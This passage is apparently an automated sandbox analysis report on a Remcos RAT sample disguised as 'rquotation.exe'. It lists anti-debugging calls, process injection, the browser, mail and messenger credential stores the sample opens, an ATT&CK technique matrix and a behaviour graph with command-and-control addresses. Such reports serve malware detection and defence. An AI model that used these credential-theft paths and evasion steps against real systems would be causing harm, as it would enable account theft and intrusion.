              Source: bhv1B9B.tmp.5.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\rquotation.exeAPI call chain: ExitProcess graph end nodegraph_0-4783
              Source: C:\Users\user\Desktop\rquotation.exeAPI call chain: ExitProcess graph end nodegraph_0-4791
              Source: C:\Users\user\Desktop\rquotation.exeAPI call chain: ExitProcess graph end nodegraph_6-34110
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\rquotation.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_374A2639
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_10001A5D LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A4AB4 mov eax, dword ptr fs:[00000030h]4_2_374A4AB4
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A724E GetProcessHeap,4_2_374A724E
              Source: C:\Users\user\Desktop\rquotation.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_374A2B1C
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_374A2639
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_374A60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: NULL target: C:\Users\user\Desktop\rquotation.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: NULL target: C:\Users\user\Desktop\rquotation.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: NULL target: C:\Users\user\Desktop\rquotation.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe "C:\Users\user\Desktop\rquotation.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\wzmiqiwgxwogvchqnsa"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\hbrbjahaleglxiduwduflf"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\jvwtktsbhmyyhorygnhgokcbue"Jump to behavior
              Source: rquotation.exe, 00000004.00000003.3177734571.000000000643F000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282509675.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3198030667.0000000006439000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: rquotation.exe, 00000004.00000002.3282509675.0000000006439000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managertup: Installing.exe
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]
              Source: rquotation.exe, 00000004.00000002.3282509675.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A2933 cpuid 4_2_374A2933
              Source: C:\Users\user\Desktop\rquotation.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_374A2264
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00405D1B GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B
              Source: C:\Users\user\Desktop\rquotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3281675400.0000000005FDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\rquotation.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6568, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\rquotation.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OMNE4NJump to behavior
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3281675400.0000000005FDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets331
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Access Token Manipulation
              Cached Domain Credentials4
              Process Discovery
              VNCGUI Input Capture13
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
              Process Injection
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612743 Sample: rquotation.exe Startdate: 12/02/2025 Architecture: WINDOWS Score: 100 34 web.opendrive.com 2->34 36 od.lk 2->36 38 2 other IPs or domains 2->38 52 Suricata IDS alerts for network traffic 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 9 other signatures 2->58 8 rquotation.exe 4 44 2->8         started        12 Colonialises.exe 17 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 8->26 dropped 28 C:\Users\user\AppData\...\Colonialises.exe, PE32 8->28 dropped 66 Detected unpacking (changes PE section rights) 8->66 68 Tries to steal Mail credentials (via file registry) 8->68 70 Tries to detect virtualization through RDTSC time measurements 8->70 72 Switches to a custom stack to bypass stack traces 8->72 14 rquotation.exe 5 17 8->14         started        30 C:\Users\user\AppData\Local\...\System.dll, PE32 12->30 dropped 74 Antivirus detection for dropped file 12->74 76 Multi AV Scanner detection for dropped file 12->76 signatures6 process7 dnsIp8 40 46.183.222.85, 49327, 59438, 59439 DATACLUBLV Latvia 14->40 42 od.lk 38.108.185.115, 443, 59436 COGENT-174US United States 14->42 44 2 other IPs or domains 14->44 32 C:\ProgramData\remcos\logs.dat, data 14->32 dropped 46 Detected Remcos RAT 14->46 48 Maps a DLL or memory area into another process 14->48 50 Installs a global keyboard hook 14->50 19 rquotation.exe 1 14->19         started        22 rquotation.exe 1 14->22         started        24 rquotation.exe 2 14->24         started        file9 signatures10 process11 signatures12 60 Tries to steal Instant Messenger accounts or passwords 19->60 62 Tries to harvest and steal browser information (history, passwords, etc) 19->62 64 Tries to steal Mail credentials (via file / registry access) 22->64

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.